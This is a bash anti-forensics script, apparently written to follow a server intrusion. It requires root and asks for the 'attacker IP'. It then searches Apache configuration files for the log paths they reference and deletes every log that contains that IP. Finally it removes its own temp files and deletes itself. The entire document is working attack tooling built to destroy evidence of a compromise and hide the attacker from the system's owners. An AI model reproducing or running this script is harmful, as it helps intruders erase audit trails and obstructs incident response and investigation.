#!/usr/local/bin/bash ### coded by t4z3v4r3d ### recurse function : i m not sure who has write that .So thanks unknown man ### made for FreeBSD First .... if [ "`id -u`" != "0" ];then echo "$0 cant run as $USER Please Give me the root perms!!!!! " exit 1 fi patern=$2 fl=/tmp/f.txt fd=/tmp/find.txt length=/tmp/l-f.txt log_f=/tmp/log_f.txt log_final=/tmp/final_log.txt null=/dev/null log_path=/tmp/log_Found_.txt tm="`date | cut -d ":" -f 1`" os=$OSTYPE # you can add all paths for all os type !M$ windows IS NOT OS ....Exactly! case $os in Linux*) path=/etc/ ;; linux*) path=/etc/ ;; freebsd*) path=/usr/local/ ;; *) path=/ ;; esac rm $fl touch $fl rm $fd touch $fd rm $log_f touch $log_f rm $log_final touch $log_final rm $log_path touch $log_path clear echo "Enter attacker IP" read -e ip if [ "`find $path -name apache >> $fl`" ];then echo -e "\033[3;2f Main path Found ....\033[0;0m" else if [ "`find $path -name apache2 >> $fl`" ];then echo "Founded Apache2 Config files" fi fi recurse () { for file in $(/bin/ls $1) do fqfn=$1/$file [[ -d $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } [[ -f $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } ######################################################### if [ -f $1 ];then let "f=f+1" if [ "`ls $1 | grep -F .conf`" ];then let "t=t+1" cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`" echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt let "nt=nt+${nom[$t]}" let "j=$nt+$t" fi fi ################################################################################ ### MOnitoring all acts ################################################################################ echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m" echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" ############################################################################## done ; } reader(){ cat $fl | while read line ;do if [ "`ls $line | grep .conf`" != "" ];then recurse $line fi let "l=l+1" done } reader log_path_reader(){ cat $log_path | while read line ;do if [ -f $line ];then if [ "`cat $line | grep "$ip"`" != "" ];then echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in " echo -n "Removing $line" rm $line if [ ! -f $line ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi fi else echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]" fi let "l2=l2+1" done } echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m" echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m" log_path_reader echo -en "\033[1;30mRemoving $0 " rm $fl $log_path $0 if [ ! -f $0 ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"